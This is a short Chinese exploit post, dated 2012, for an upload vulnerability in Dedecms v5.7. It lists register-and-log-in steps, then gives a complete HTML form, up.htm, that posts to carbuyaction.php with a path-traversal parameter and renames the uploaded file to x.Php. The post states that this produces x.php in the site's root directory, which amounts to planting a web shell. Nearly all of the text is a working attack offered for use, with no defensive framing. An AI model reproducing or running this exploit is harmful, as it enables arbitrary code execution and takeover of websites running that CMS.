Title:Dedecms v5.7包含上传漏洞利用 –2012-09-21 10:16
注册,登录,免邮箱验证.
up.htm
———————————————————————————————————
<form action="http://www.xx.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">file:<input name="uploadfile" type="file" /><br>newname:<input name="newname" type="text" value="x.Php"/><button class="button2" type="submit">提交</button><br><br>
———————————————————————————————————
根目录生成x.php
从哪里跌倒就会从哪里爬起来,让我们一起努力吧